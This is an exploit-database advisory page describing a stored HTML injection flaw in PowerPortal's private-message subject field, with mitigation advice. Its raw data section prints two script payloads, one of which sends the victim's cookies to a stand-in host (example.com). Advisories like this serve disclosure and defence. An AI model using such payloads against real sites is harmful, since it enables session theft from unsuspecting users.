header-logo
Suggest Exploit
vendor:
PowerPortal
by:
5.5
CVSS
MEDIUM
HTML Injection
79
CWE
Product Name: PowerPortal
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

HTML Injection in PowerPortal

A vulnerability is reported for PowerPortal which may make it prone to HTML injection attacks. The problem is said to occur due to a lack of sufficient sanitization performed on private message data. Specifically, when creating PowerPortal private messages, the subject field may not be sufficiently sanitized of malicious content. This may make it possible for an attacker to place HTML or script code within the subject field of a private PowerPortal message for another user. The examples provided include injecting JavaScript code to display an alert with the user's cookies and redirecting the user to a malicious website with the user's cookies as a parameter.

Mitigation:

To mitigate this vulnerability, PowerPortal should implement proper input validation and sanitization of the subject field to prevent the execution of HTML or script code. Input filtering and encoding techniques can be used to ensure that user-supplied data is treated as plain text and not interpreted as executable code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10835/info

A vulnerability is reported for PowerPortal which may make it prone to HTML injection attacks. The problem is said to occur due to a lack of sufficient sanitization performed on private message data.

Specifically, when creating PowerPortal private messages, the subject field may not be sufficiently sanitized of malicious content. This may make it possible for an attacker to place HTML or script code within the subject field of a private PowerPortal message for another user.

Subject: <script>alert(document.cookie);</script>
Subject: <script>document.location='http://www.example.com/?'+document.cookie</script>

Navigation

Suggest Exploit

Services By CQR